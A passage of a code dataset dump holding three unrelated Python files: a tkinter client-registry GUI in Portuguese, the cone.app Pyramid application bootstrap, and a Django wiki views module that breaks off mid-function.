+{"seq_id":"74983786750","text":"from tkinter import*\nfrom tkinter import messagebox\nfrom tkinter import Tk, StringVar, ttk\nfrom PIL import Image, ImageTk\nfrom tkcalendar import Calendar, DateEntry\nfrom datetime import date\nfrom view import *\n\n\n\n\n\njanela = Tk()\njanela.title('')\njanela.geometry('1200x600')\njanela.configure(background=\"gray\")\njanela.resizable(width=FALSE, height=FALSE)\n\nstyle = ttk.Style(janela)\nstyle.theme_use('clam')\n\n#criando frames\n\nframeCima = Frame(janela, width=1200, height=50, bg=\"#feffff\", relief=FLAT)\nframeCima.grid(row=0, column=0)\n\nframeMeio = Frame(janela, width= 1043, height=303, bg=\"#feffff\", pady=20, relief=FLAT)\nframeMeio.grid(row=1, column=0, pady=1, padx=0, sticky=NSEW)\n\nframeBaixo = Frame(janela, width= 1043, height=300, bg=\"#feffff\", pady=20, relief=FLAT)\nframeBaixo.grid(row=2, column=0, pady=1, padx=0, sticky=NSEW)\n#conectando funçoes\n \nglobal tree\n\ndef inserir():\n \n\n nome=e_nome.get()\n idade=e_idade.get()\n turno=e_turno.get()\n endereco=e_endereco.get()\n dataE=e_cale.get()\n dataS=e_cals.get()\n dataPag=e_calpag.get()\n cont=e_contato.get()\n obs=e_pesquisar.get()\n\n lista_cadastrar = [nome, idade, turno, endereco, dataE, dataS, dataPag, cont, obs]\n\n for i in lista_cadastrar:\n if i =='':\n messagebox.showerror('Erro', 'Preencha todos os campos')\n return\n \n inserir_cadastro(lista_cadastrar)\n messagebox.showinfo('Sucesso', 'sucesso')\n \n e_nome.delete(0,'end')\n e_idade.delete(0,'end')\n e_turno.delete(0,'end')\n e_endereco.delete(0,'end')\n e_cale.delete(0,'end')\n e_cals.delete(0,'end')\n e_calpag.delete(0,'end')\n e_contato.delete(0,'end')\n e_pesquisar.delete(0,'end') \n\n mostrar()\n\n\ndef atualizar():\n try:\n treev_clientes = tree.focus()\n treev_dicionario = tree.item(treev_clientes)\n treev_lista = treev_dicionario['values']\n\n valor =treev_lista[0]\n\n e_nome.delete(0,'end')\n e_idade.delete(0,'end')\n e_turno.delete(0,'end')\n e_endereco.delete(0,'end')\n e_cale.delete(0,'end')\n e_cals.delete(0,'end')\n e_calpag.delete(0,'end')\n e_contato.delete(0,'end')\n e_pesquisar.delete(0,'end')\n\n id=int(treev_lista[0])\n e_nome.insert(0,treev_lista[1])\n e_idade.insert(0,treev_lista[2])\n e_turno.insert(0,treev_lista[3])\n e_endereco.insert(0,treev_lista[4])\n e_cale.insert(0,treev_lista[5])\n e_cals.insert(0,treev_lista[6])\n e_calpag.insert(0,treev_lista[7])\n e_contato.insert(0,treev_lista[8])\n e_pesquisar.insert(0,treev_lista[9])\n\n def update():\n nome=e_nome.get()\n idade=e_idade.get()\n turno=e_turno.get()\n endereco=e_endereco.get()\n dataE=e_cale.get()\n dataS=e_cals.get()\n dataPag=e_calpag.get()\n cont=e_contato.get()\n obs=e_pesquisar.get()\n \n lista_atualizar = [nome, idade, turno, endereco, dataE, dataS, dataPag, cont, obs, id]\n \n for i in lista_atualizar:\n if i=='':\n messagebox.showerror('Erro', 'Preencha todos os campos')\n return\n \n atualizar_dados(lista_atualizar)\n messagebox.showinfo('Sucesso', 'Sucesso')\n\n e_nome.delete(0,'end')\n e_idade.delete(0,'end')\n e_turno.delete(0,'end')\n e_endereco.delete(0,'end')\n e_cale.delete(0,'end')\n e_cals.delete(0,'end')\n e_calpag.delete(0,'end')\n e_contato.delete(0,'end')\n e_pesquisar.delete(0,'end')\n\n b_comfirm.destroy()\n\n mostrar()\n \n b_comfirm = Button(frameMeio,command=update, width=13, text='Confirmar'.upper(), overrelief=RIDGE, font=('Ivy 8 bold'), bg=\"#feffff\", fg=\"#2e2d2b\")\n b_comfirm.place(x=330, y=185)\n\n\n\n\n\n except IndexError:\n messagebox.showerror('Erro', 'Seleciona um dos dados na tebela')\n#função delete\ndef deletar():\n try:\n treev_clientes = tree.focus()\n treev_dicionario = tree.item(treev_clientes)\n treev_lista = treev_dicionario['values']\n\n valor =treev_lista[0]\n\n deletar_dados([valor])\n\n messagebox.showinfo('Sucesso', 'Sucesso')\n\n mostrar()\n\n except IndexError:\n messagebox.showerror('Erro', 'Seleciona um dos dados na tebela')\n\n\n# função ver item\ndef ver_cliente1(): \n treev_clientes = tree.focus()\n treev_dicionario = tree.item(treev_clientes)\n treev_lista = treev_dicionario['values']\n\n valor = [int(treev_lista[0])] \n\n cliente = ver_cliente(valor)\n\n \n vdados = cliente[0][1]\n l_vdados = Label(frameMeio, text='Nome: '+vdados, height=1, anchor=NW, font=('Ivy 10 bold'), bg=\"#feffff\", fg=\"#403d3d\")\n l_vdados.place(x=700, y=10)\n \n vdados = cliente[0][2]\n l_vdados = Label(frameMeio, text='idade: '+str(vdados), height=1, anchor=NW, font=('Ivy 10 bold'), bg=\"#feffff\", fg=\"#403d3d\")\n l_vdados.place(x=850, y=10)\n\n vdados = cliente[0][3]\n l_vdados = Label(frameMeio, text='Turno: '+vdados, height=1, anchor=NW, font=('Ivy 10 bold'), bg=\"#feffff\", fg=\"#403d3d\")\n l_vdados.place(x=700, y=40)\n \n vdados = cliente[0][4]\n l_vdados = Label(frameMeio, text='Endereço: '+vdados, height=1, anchor=NW, font=('Ivy 10 bold'), bg=\"#feffff\", fg=\"#403d3d\")\n l_vdados.place(x=850, y=40)\n \n vdados = cliente[0][5]\n l_vdados = Label(frameMeio, text='Entrada: '+vdados, height=1, anchor=NW, font=('Ivy 10 bold'), bg=\"#feffff\", fg=\"#403d3d\")\n l_vdados.place(x=700, y=70)\n\n vdados = cliente[0][6]\n l_vdados = Label(frameMeio, text='Saida: '+vdados, height=1, anchor=NW, font=('Ivy 10 bold'), bg=\"#feffff\", fg=\"#403d3d\")\n l_vdados.place(x=850, y=70)\n \n vdados = cliente[0][7]\n l_vdados = Label(frameMeio, text='Ultimo Pagamento: '+vdados, height=1, anchor=NW, font=('Ivy 10 bold'), bg=\"#feffff\", fg=\"#403d3d\")\n l_vdados.place(x=700, y=100)\n \n vdados = cliente[0][8]\n l_vdados = Label(frameMeio, text='Contato: '+vdados, height=1, anchor=NW, font=('Ivy 10 bold'), bg=\"#feffff\", fg=\"#403d3d\")\n l_vdados.place(x=700, y=130)\n\n vdados = cliente[0][8]\n l_vdados = Label(frameMeio, text='Observações: '+vdados, height=1, anchor=NW, font=('Ivy 10 bold'), bg=\"#feffff\", fg=\"#403d3d\")\n l_vdados.place(x=700, y=160)\n \n\n \n\n#logo\napp_img = Image.open('iconprincipal.png.png')\napp_img = app_img.resize((45,45))\napp_img = ImageTk.PhotoImage(app_img)\n\napp_logo = Label(frameCima, image=app_img, text='Clientes Arvore da vida', width=900, compound=LEFT, relief=RAISED, anchor=NW, font=('Verdana 20 bold'), bg= \"#feffff\", fg=\"#403d3d\")\napp_logo.place(x=0, y=0)\n\n#frame meio\nl_nome = Label(frameMeio, text='Nome', height=1, anchor=NW, font=('Ivy 10 bold'), bg=\"#feffff\", fg=\"#403d3d\")\nl_nome.place(x=10, y=10)\ne_nome = Entry(frameMeio, width=30, justify='left', relief=SOLID)\ne_nome.place(x=130, y=11)\n\nl_idade = Label(frameMeio, text='Idade', height=1, anchor=NW, font=('Ivy 10 bold'), bg=\"#feffff\", fg=\"#403d3d\")\nl_idade.place(x=10, y=40)\ne_idade = Entry(frameMeio, width=30, justify='left', relief=SOLID)\ne_idade.place(x=130, y=41)\n\nl_turno = Label(frameMeio, text='Turno', height=1, anchor=NW, font=('Ivy 10 bold'), bg=\"#feffff\", fg=\"#403d3d\")\nl_turno.place(x=10, y=70)\ne_turno = Entry(frameMeio, width=30, justify='left', relief=SOLID)\ne_turno.place(x=130, y=71)\n\n\nl_endereco = Label(frameMeio, text='Endereço', height=1, anchor=NW, font=('Ivy 10 bold'), bg=\"#feffff\", fg=\"#403d3d\")\nl_endereco.place(x=10, y=100)\ne_endereco = Entry(frameMeio, width=30, justify='left', relief=SOLID)\ne_endereco.place(x=130, y=101)\n\nl_cale = Label(frameMeio, text='Data de entrada', height=1, anchor=NW, font=('Ivy 10 bold'), bg=\"#feffff\", fg=\"#403d3d\")\nl_cale.place(x=10, y=130)\ne_cale = DateEntry(frameMeio, width=12,Background='darkblue', bordewidth= 2, year=2023)\ne_cale.place(x=130, y=131)\n\nl_cals = Label(frameMeio, text='Data de saida', height=1, anchor=NW, font=('Ivy 10 bold'), bg=\"#feffff\", fg=\"#403d3d\")\nl_cals.place(x=10, y=160)\ne_cals = DateEntry(frameMeio, width=12,Background='darkblue', bordewidth= 2, year=2023)\ne_cals.place(x=130, y=161)\n\nl_calpag = Label(frameMeio, text='Ultimo pagamento', height=1, anchor=NW, font=('Ivy 10 bold'), bg=\"#feffff\", fg=\"#403d3d\")\nl_calpag.place(x=10, y=190)\ne_calpag = DateEntry(frameMeio, width=12,Background='darkblue', bordewidth= 2, year=2023)\ne_calpag.place(x=130, y=191)\n\nl_contato = Label(frameMeio, text='Contato', height=1, anchor=NW, font=('Ivy 10 bold'), bg=\"#feffff\", fg=\"#403d3d\")\nl_contato.place(x=10, y=220)\ne_contato = Entry(frameMeio, width=30, justify='left', relief=SOLID)\ne_contato.place(x=130, y=221)\n\nl_pesquisar = Label(frameMeio, text='Observação', height=1, anchor=NW, font=('Ivy 10 bold'), bg=\"#feffff\", fg=\"#403d3d\")\nl_pesquisar.place(x=10, y=250)\ne_pesquisar = Entry(frameMeio, width=30, justify='left', relief=SOLID)\ne_pesquisar.place(x=130, y=251)\n\n#cirando buttom\napp_add = Image.open('cadastrar.png')\napp_add = app_add.resize((20,20))\napp_add = ImageTk.PhotoImage(app_add)\n\nb_cadastrar = Button(frameMeio, command=inserir, image=app_add, width=95, text=' Cadastrar'.upper(), compound=LEFT, anchor=NW, overrelief=RIDGE, font=('Ivy 8'), bg=\"#feffff\", fg=\"#2e2d2b\")\nb_cadastrar.place(x=330, y=10)\n\napp_atualizar = Image.open('update.png')\napp_atualizar = app_atualizar.resize((20,20))\napp_atualizar = ImageTk.PhotoImage(app_atualizar)\n\nb_atulizar = Button(frameMeio,command=atualizar, image=app_atualizar, width=95, text=' Atulizar'.upper(), compound=LEFT, anchor=NW, overrelief=RIDGE, font=('Ivy 8'), bg=\"#feffff\", fg=\"#2e2d2b\")\nb_atulizar.place(x=330, y=50)\n\napp_delete = Image.open('delete.png')\napp_delete = app_delete.resize((20,20))\napp_delete = ImageTk.PhotoImage(app_delete)\n\nb_delete = Button(frameMeio,command=deletar, image=app_delete, width=95, text=' delete'.upper(), compound=LEFT, anchor=NW, overrelief=RIDGE, font=('Ivy 8'), bg=\"#feffff\", fg=\"#2e2d2b\")\nb_delete.place(x=330, y=90)\n\napp_cliente = Image.open('cliente.png')\napp_cliente = app_cliente.resize((20,20))\napp_cliente = ImageTk.PhotoImage(app_cliente)\n\nb_cliente = Button(frameMeio, command=ver_cliente1, image=app_cliente, width=95, text=' cliente'.upper(), compound=LEFT, anchor=NW, overrelief=RIDGE, font=('Ivy 8'), bg=\"#feffff\", fg=\"#2e2d2b\")\nb_cliente.place(x=330, y=251)\n\nl_quantidade = Label(frameMeio, text='',pady=5, width=14, height=2, anchor=CENTER, font=('Ivy 17 bold'), bg=\"#4fa882\", fg=\"#403d3d\")\nl_quantidade.place(x=450, y=17)\n\nl_quantidade_ = Label(frameMeio, text=' Quantidade Total de Clientes. ', height=1, anchor=NW, font=('Ivy 10 bold'), bg=\"#4fa882\", fg=\"#403d3d\")\nl_quantidade_.place(x=450, y=12)\n\ndef mostrar():\n global tree\n\n\n tabela_head = ['#Numero','Nome', 'Idade','Turno','Endereço', 'Data de entrada', 'Data de saida', 'Ultimo pagamento', 'Contato responsavel', 'Observações']\n\n lista_itens = ver_dados()\n\n\n\n tree = ttk.Treeview(frameBaixo, selectmode=\"extended\",columns=tabela_head, show=\"headings\")\n\n # vertical scrollbar\n vsb = ttk.Scrollbar(frameBaixo, orient=\"vertical\", command=tree.yview)\n\n # horizontal scrollbar\n hsb = ttk.Scrollbar(frameBaixo, orient=\"horizontal\", command=tree.xview)\n\n tree.configure(yscrollcommand=vsb.set, xscrollcommand=hsb.set)\n tree.grid(column=0, row=0, sticky='nsew')\n vsb.grid(column=1, row=0, sticky='ns')\n hsb.grid(column=0, row=1, sticky='ew')\n frameBaixo.grid_rowconfigure(0, weight=12)\n\n hd=[\"center\",\"center\",\"center\",\"center\",\"center\",\"center\",\"center\",\"center\",\"center\",\"center\"]\n h=[80,100,40,80,160,110,110,120,130,180]\n n=0\n\n for col in tabela_head:\n tree.heading(col, text=col.title(), anchor=CENTER)\n # adjust the column's width to the header string\n tree.column(col, width=h[n],anchor=hd[n])\n n+=1\n\n # inserindo os itens dentro da tabela\n for item in lista_itens:\n tree.insert('', 'end', values=item)\n \n\n quantidade = []\n\n for iten in lista_itens:\n quantidade.append(iten[1])\n\n\n Total_itens = len(quantidade)\n\n\n l_quantidade['text'] = Total_itens\n\nmostrar()\n\n\n\n\njanela.mainloop()\n\n\n","repo_name":"Jvbrs/cadastros-clientes","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":12249,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"22886101998","text":"# -*- coding: utf-8 -*-\nfrom cone.app import browser\nfrom cone.app import security\nfrom cone.app.interfaces import IApplicationNode\nfrom cone.app.model import AppRoot\nfrom cone.app.model import AppSettings\nfrom cone.app.model import LayoutConfig\nfrom cone.app.model import Properties\nfrom cone.app.ugm import ugm_backend\nfrom cone.app.utils import format_traceback\nfrom cone.app.utils import node_path\nfrom node.interfaces import INode\nfrom pyramid.authentication import AuthTktAuthenticationPolicy\nfrom pyramid.authorization import ACLAuthorizationPolicy\nfrom pyramid.config import Configurator\nfrom pyramid.static import static_view\nfrom pyramid.traversal import ResourceTreeTraverser\nfrom yafowil.resources import YafowilResources as YafowilResourcesBase\nfrom zope.component import adapter\nfrom zope.component import getGlobalSiteManager\nimport importlib\nimport logging\nimport pyramid_chameleon\nimport pyramid_zcml\nimport sys\nimport threading\n\n\nlogger = logging.getLogger('cone.app')\n\n# configuration\ncfg = Properties()\n\n# available languages\ncfg.available_languages = []\n\n# used main template\ncfg.main_template = 'cone.app.browser:templates/main.pt'\n\n# default node icon\ncfg.default_node_icon = 'glyphicon glyphicon-asterisk'\n\n# XXX: move resource registration to browser package\n# XXX: support developmenet and production mode\n\n# JS resources\ncfg.js = Properties()\ncfg.js.public = [\n 'static/public.js'\n]\ncfg.js.protected = [\n 'static/protected.js'\n]\n\n# CSS Resources\ncfg.css = Properties()\n\n# development\ncfg.css.public = [\n 'static/jqueryui/jquery-ui-1.10.3.custom.css',\n 'static/bootstrap/css/bootstrap.css',\n 'static/bootstrap/css/bootstrap-theme.css',\n 'static/ionicons/css/ionicons.css',\n 'static/typeahead/typeahead.css',\n '++resource++bdajax/bdajax_bs3.css',\n 'static/styles.css'\n]\n\n# production\n# cfg.css.public = [\n# 'static/jqueryui/jquery-ui-1.10.3.custom.css',\n# 'static/bootstrap/css/bootstrap.min.css',\n# 'static/bootstrap/css/bootstrap-theme.min.css',\n# 'static/ionicons/css/ionicons.css',\n# 'static/typeahead/typeahead.css',\n# '++resource++bdajax/bdajax_bs3.css',\n# 'static/styles.css'\n# ]\n\ncfg.css.protected = list()\n\n# JS and CSS Assets to publish merged\ncfg.merged = Properties()\ncfg.merged.js = Properties()\n\n# development\ncfg.merged.js.public = [\n (browser.static_resources, 'jquery-1.9.1.js'),\n (browser.static_resources, 'jquery.migrate-1.2.1.js'),\n (browser.static_resources, 'jqueryui/jquery-ui-1.10.3.custom.js'),\n (browser.static_resources, 'bootstrap/js/bootstrap.js'),\n (browser.static_resources, 'typeahead/typeahead.bundle.js'),\n (browser.static_resources, 'cookie_functions.js')\n]\n\n# production\n# cfg.merged.js.public = [\n# (browser.static_resources, 'jquery-1.9.1.min.js'),\n# (browser.static_resources, 'jquery.migrate-1.2.1.min.js'),\n# (browser.static_resources, 'jqueryui/jquery-ui-1.10.3.custom.min.js'),\n# (browser.static_resources, 'bootstrap/js/bootstrap.min.js'),\n# (browser.static_resources, 'typeahead/typeahead.bundle.js'),\n# (browser.static_resources, 'cookie_functions.js')\n# ]\n\ncfg.merged.js.protected = list()\n\ncfg.merged.css = Properties()\ncfg.merged.css.public = list()\ncfg.merged.css.protected = list()\n\ncfg.merged.print_css = Properties()\ncfg.merged.print_css.public = [\n (browser.static_resources, 'print.css')\n]\ncfg.merged.print_css.protected = list()\n\n\nclass layout_config(object):\n _registry = dict()\n\n def __init__(self, *for_):\n self.for_ = for_\n\n def __call__(self, factory):\n for context in self.for_:\n self._registry[context] = factory\n return factory\n\n @classmethod\n def lookup(cls, model=None, request=None):\n for cls_ in model.__class__.mro():\n factory = cls._registry.get(cls_)\n if factory:\n return factory(model=model, request=request)\n\n\n@layout_config(object)\nclass DefaultLayoutConfig(LayoutConfig):\n\n def __init__(self, model=None, request=None):\n super(DefaultLayoutConfig, self).__init__(model=model, request=request)\n self.mainmenu = True\n self.mainmenu_fluid = False\n self.livesearch = True\n self.personaltools = True\n self.columns_fluid = False\n self.pathbar = True\n self.sidebar_left = ['navtree']\n self.sidebar_left_grid_width = 3\n self.content_grid_width = 9\n\n\ndef import_from_string(path):\n mod, ob = path.rsplit('.', 1)\n return getattr(importlib.import_module(mod), ob)\n\n\nroot = None\n\n\ndef get_root(environ=None):\n return root\n\n\ndef configure_root(root, settings):\n root.metadata.title = settings.get('cone.root.title', 'CONE')\n root.properties.default_child = settings.get('cone.root.default_child')\n mainmenu_empty_title = settings.get('cone.root.mainmenu_empty_title')\n mainmenu_empty_title = mainmenu_empty_title in ['True', 'true', '1']\n root.properties.mainmenu_empty_title = mainmenu_empty_title\n default_content_tile = settings.get('cone.root.default_content_tile')\n if default_content_tile:\n root.properties.default_content_tile = default_content_tile\n root.properties.in_navtree = False\n\n\ndef default_root_node_factory(settings):\n root = AppRoot()\n root.factories['settings'] = AppSettings\n configure_root(root, settings)\n return root\n\n\ndef register_config(key, factory):\n root = get_root()\n factories = root['settings'].factories\n if key in factories:\n raise ValueError(u\"Config with name '%s' already registered.\" % key)\n factories[key] = factory\n\n\n# B/C\nregister_plugin_config = register_config\n\n\ndef register_entry(key, factory):\n root = get_root()\n factories = root.factories\n if key in factories:\n raise ValueError(u\"Entry with name '%s' already registered.\" % key)\n root.factories[key] = factory\n\n\n# B/C\nregister_plugin = register_entry\n\n\nmain_hooks = list()\n\n\ndef main_hook(func):\n \"\"\"decorator to register main hook.\n\n Decorated function gets called on application startup.\n \"\"\"\n main_hooks.append(func)\n return func\n\n\n# B/C\ndef register_main_hook(callback):\n \"\"\"Register function to get called on application startup.\n \"\"\"\n main_hooks.append(callback)\n\n\nthread_shutdown_hooks = list()\n\n\ndef thread_shutdown_hook(func): # pragma: no cover\n \"\"\"decorator to register thread shutdown hook.\n\n Decorated function gets called when main thread joins. Thread shutdown\n hooks are used for graceful joining of non daemon threads.\n \"\"\"\n thread_shutdown_hooks.append(func)\n return func\n\n\ndef auth_tkt_factory(**kwargs):\n kwargs.setdefault('callback', security.groups_callback)\n return AuthTktAuthenticationPolicy(**kwargs)\n\n\ndef acl_factory(**kwargs):\n return ACLAuthorizationPolicy()\n\n\ncfg.yafowil = Properties()\ncfg.yafowil.js_skip = set()\ncfg.yafowil.css_skip = set()\n\n# ignore bootstrap dependencies delivered by yafowil.bootstrap\ncfg.yafowil.js_skip.add('bootstrap.dependencies')\ncfg.yafowil.css_skip.add('bootstrap.dependencies')\n\n\nclass YafowilResources(YafowilResourcesBase):\n\n def __init__(self, js_skip=[], css_skip=[], config=None):\n self.config = config\n super(YafowilResources, self).__init__(\n js_skip=js_skip,\n css_skip=css_skip\n )\n\n def configure_resource_directory(self, plugin_name, resourc_edir):\n app = sys.modules[__name__]\n resources_view = static_view(resourc_edir, use_subpath=True)\n view_name = '%s_resources' % plugin_name.replace('.', '_')\n setattr(app, view_name, resources_view)\n view_path = 'cone.app.%s' % view_name\n resource_base = '++resource++%s' % plugin_name\n self.config.add_view(view_path, name=resource_base)\n return resource_base\n\n\ndef configure_yafowil_addon_resources(config, public):\n resources = YafowilResources(\n js_skip=cfg.yafowil.js_skip,\n css_skip=cfg.yafowil.css_skip,\n config=config\n )\n js_resources = cfg.js.public if public else cfg.js.protected\n css_resources = cfg.css.public if public else cfg.css.protected\n for js in reversed(resources.js_resources):\n js_resources.insert(0, js)\n for css in resources.css_resources:\n css_resources.insert(0, css)\n\n\ndef configure_bdajax_resources():\n # bdajax needs to be loaded before resources depending on it order to\n # avoid double binding on document ready\n cfg.js.public.insert(0, '++resource++bdajax/bdajax_bs3.js')\n cfg.js.public.insert(0, '++resource++bdajax/bdajax.js')\n cfg.js.public.insert(0, '++resource++bdajax/overlay.js')\n\n\n@adapter(IApplicationNode)\nclass ApplicationNodeTraverser(ResourceTreeTraverser):\n\n def __call__(self, request):\n result = super(ApplicationNodeTraverser, self).__call__(request)\n context = result['context']\n if not IApplicationNode.providedBy(context):\n if INode.providedBy(context):\n result['context'] = context.acquire(IApplicationNode)\n result['view_name'] = context.name\n result['traversed'] = tuple(node_path(result['context']))\n else:\n result['context'] = get_root()\n result['view_name'] = ''\n result['traversed'] = tuple()\n return result\n\n\ndef start_thread_monitor(): # pragma: no cover\n if not thread_shutdown_hooks:\n return\n\n def _monitor():\n main_thread = threading.main_thread()\n main_thread.join()\n for hook in thread_shutdown_hooks:\n hook()\n\n monitor = threading.Thread(target=_monitor)\n monitor.daemon = True\n monitor.start()\n\n\ndef main(global_config, **settings):\n \"\"\"Returns WSGI application.\n \"\"\"\n # set authentication related application properties\n security.ADMIN_USER = settings.get('cone.admin_user')\n security.ADMIN_PASSWORD = settings.get('cone.admin_password')\n security.AUTHENTICATOR = settings.get('cone.authenticator')\n\n auth_secret = settings.pop('cone.auth_secret', 'secret')\n auth_cookie_name = settings.pop('cone.auth_cookie_name', 'auth_tkt')\n auth_secure = settings.pop('cone.auth_secure', False)\n auth_include_ip = settings.pop('cone.auth_include_ip', False)\n auth_timeout = settings.pop('cone.auth_timeout', None)\n auth_reissue_time = settings.pop('cone.auth_reissue_time', None)\n if auth_reissue_time is not None:\n auth_reissue_time = int(auth_reissue_time)\n auth_max_age = settings.pop('cone.auth_max_age', None)\n if auth_max_age is not None:\n auth_max_age = int(auth_max_age)\n auth_http_only = settings.pop('cone.auth_http_only', False)\n auth_path = settings.pop('cone.auth_path', \"/\")\n auth_wild_domain = settings.pop('cone.auth_wild_domain', True)\n\n auth_policy = auth_tkt_factory(\n secret=auth_secret,\n cookie_name=auth_cookie_name,\n secure=auth_secure,\n include_ip=auth_include_ip,\n timeout=auth_timeout,\n reissue_time=auth_reissue_time,\n max_age=auth_max_age,\n http_only=auth_http_only,\n path=auth_path,\n wild_domain=auth_wild_domain,\n )\n\n # create root node\n global root\n root_node_factory = settings.pop('cone.root.node_factory', None)\n if root_node_factory:\n root = import_from_string(root_node_factory)(settings)\n else:\n root = default_root_node_factory(settings)\n\n if settings.get('testing.hook_global_registry'):\n globalreg = getGlobalSiteManager()\n config = Configurator(registry=globalreg)\n config.setup_registry(root_factory=get_root, settings=settings)\n else:\n config = Configurator(root_factory=get_root, settings=settings)\n\n # set authentication and authorization policies\n config.set_authentication_policy(auth_policy)\n config.set_authorization_policy(acl_factory())\n config.commit()\n\n # begin configuration\n config.begin()\n\n # include general dependencies\n config.include(pyramid_chameleon)\n config.include(pyramid_zcml)\n\n # add custom traverser\n config.registry.registerAdapter(ApplicationNodeTraverser)\n\n # available languages\n available_languages = settings.get('cone.available_languages', '')\n cfg.available_languages = [\n lang.strip() for lang in available_languages.split(',') if lang\n ]\n\n # main template\n main_template = settings.get('cone.main_template')\n if main_template:\n cfg.main_template = main_template\n\n # add translation\n config.add_translation_dirs('cone.app:locale/')\n\n # XXX: register yafowil and all yafowil addon widget locales.\n # provide locales either in yafowil resources or as entry points in\n # all yafowil packages providing translations\n\n # static routes\n config.add_route(\"favicon\", \"/favicon.ico\")\n # XXX: robots.txt\n # XXX: humans.txt\n\n # register static resources\n config.add_view(browser.static_resources, name='static')\n\n # scan browser package\n config.scan(browser)\n\n # load zcml\n config.load_zcml('configure.zcml')\n\n # read plugin configurator\n plugins = settings.get('cone.plugins', '')\n plugins = plugins.split('\\n')\n plugins = [pl for pl in plugins if pl and not pl.startswith('#')]\n for plugin in plugins:\n try:\n importlib.import_module(plugin)\n except ImportError:\n msg = 'Cannot import plugin {}\\n{}'.format(\n plugin,\n format_traceback()\n )\n logger.error(msg)\n continue\n try:\n config.load_zcml('{}:configure.zcml'.format(plugin))\n except IOError: # pragma: no cover\n msg = 'No configure.zcml in {}'.format(plugin)\n logger.info(msg)\n\n # execute main hooks\n filtered_hooks = list()\n for plugin in plugins:\n for hook in main_hooks:\n if hook.__module__.startswith(plugin):\n filtered_hooks.append(hook)\n for hook in filtered_hooks:\n hook(config, global_config, settings)\n\n # load and initialize UGM\n backend_name = settings.get('ugm.backend')\n # B/C\n if not backend_name:\n backend_name = settings.get('cone.auth_impl')\n if backend_name:\n try:\n ugm_backend.load(backend_name, settings)\n ugm_backend.initialize()\n except Exception: # pragma: no cover\n msg = 'Failed to create UGM backend:\\n{}'.format(format_traceback())\n logger.error(msg)\n\n user_display_attr = settings.get('ugm.user_display_attr')\n if user_display_attr:\n ugm_backend.user_display_attr = user_display_attr\n\n group_display_attr = settings.get('ugm.group_display_attr')\n if group_display_attr:\n ugm_backend.group_display_attr = group_display_attr\n\n # register yafowil static resources\n # done after addon config - addon code may disable yafowil resource groups\n # XXX: ``yafowil.resources_public`` is a temporary hack and stays\n # undocumented. In 1.1. ``webresource`` will be used for resource\n # registration and resource delivery configuration.\n yafowil_resources_public = settings.get('yafowil.resources_public')\n yafowil_resources_public = yafowil_resources_public in ['1', 'True', 'true']\n configure_yafowil_addon_resources(config, yafowil_resources_public)\n\n # ensure bdajax resources gets loaded before resources depending on it\n configure_bdajax_resources()\n\n # end configuration\n config.end()\n\n # start thread monitor if thread shutdown hooks registered\n start_thread_monitor()\n\n # return wsgi app\n return config.make_wsgi_app()\n\n\ndef make_remote_addr_middleware(app, global_conf):\n return RemoteAddrFilter(app)\n\n\nclass RemoteAddrFilter(object):\n \"\"\"Use this middleware if nginx is used as proxy and IP address should be\n included in auth cookie. make sure nginx passes the right header:\n\n proxy_set_header X-Real-IP $remote_addr;\n \"\"\"\n\n def __init__(self, app):\n self.app = app\n\n def __call__(self, environ, start_response):\n if 'HTTP_X_REAL_IP' in environ:\n environ['REMOTE_ADDR'] = environ['HTTP_X_REAL_IP']\n return self.app(environ, start_response)\n","repo_name":"conestack/cone.app","sub_path":"src/cone/app/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":16176,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"60"} +{"seq_id":"8438238341","text":"from django.shortcuts import render\nfrom django.http import HttpResponseRedirect\nfrom django.http import HttpResponse\nfrom django.urls import reverse\nfrom django.core.exceptions import ValidationError\nfrom django import forms\nimport random\n\nimport markdown2\nfrom . import util\n\nclass EntryForm(forms.Form):\n title = forms.CharField(label=\"Title\")\n content = forms.CharField(label='', widget = forms.Textarea(attrs={'rows':20, 'cols':60}))\n\n def clean(self): # Validates the entire form.\n cleaned_data = super().clean()\n title_data = cleaned_data.get('title')\n title_content = cleaned_data.get('content')\n\n entered_line = title_content.partition('\\n')[0]\n ideal_line = '# '+ title_data\n if entered_line.strip() != ideal_line.strip(): # Check that the content format matches the title.\n if title_data in util.list_entries():\n raise ValidationError({\n 'title': ['Error: The title \"' + title_data + '\" already exists.'],\n 'content': ['Error: The first line of this entry should be: # ' + title_data],\n })\n raise ValidationError({'content':['Error: The first line of this entry should be: # ' + title_data]})\n if title_data in util.list_entries():\n raise ValidationError('Error: The title \"' + title_data + '\" already exists.')\n\nclass EditForm(forms.Form):\n title = forms.CharField(widget=forms.HiddenInput())\n content = forms.CharField(label='', widget = forms.Textarea(attrs={'rows':20, 'cols':60}))\n\n \"\"\"def clean(self): # Validates the entire form.\n cleaned_data = super().clean()\n title_data = cleaned_data.get('title')\n title_content = cleaned_data.get('content')\n\n first_line = title_content.partition('\\n')[0]\n ideal_line = '# ' + title_data\n if first_line.strip() != ideal_line.strip(): # Check that the content format matches the title.\n raise ValidationError('Error: The first line of this entry should be: # ' + title_data)\n\"\"\"\ndef index(request):\n # Search Bar Function\n query = request.GET.get('q')\n if query != None:\n return HttpResponseRedirect(reverse('search', args=[query]))\n # Search Bar Function\n\n else:\n return render(request, \"encyclopedia/index.html\", {\n \"entries\": util.list_entries()\n })\n\ndef entry(request, entry):\n # Search Bar Function\n query = request.GET.get('q')\n if query != None:\n return HttpResponseRedirect(reverse('search', args=[query]))\n # Search Bar Function\n\n if util.get_entry(entry) == None:\n return render(request, \"encyclopedia/entryPage.html\", {\n \"entry\" : entry,\n \"exists\" : False\n })\n return render(request, \"encyclopedia/entryPage.html\", {\n \"entry\" : entry,\n \"exists\" : True,\n \"content\" : markdown2.markdown(util.get_entry(entry))\n })\n\n\ndef search(request, search):\n # Search Bar Function\n query = request.GET.get('q')\n if query != None:\n return HttpResponseRedirect(reverse('search', args=[query]))\n # Search Bar Function\n\n if search in util.list_entries():\n return HttpResponseRedirect(reverse('entry', args=[search]))\n else:\n match_list = []\n for i in util.list_entries():\n if search.lower() in i.lower():\n match_list.append(i)\n return render(request, \"encyclopedia/searchPage.html\", {\n \"list\" : match_list\n })\n\ndef Create_New_Page(request):\n if request.method == \"POST\":\n form = EntryForm(request.POST)\n if form.is_valid(): # Server Side Validation\n form_title = form.cleaned_data['title']\n form_content = form.cleaned_data['content']\n 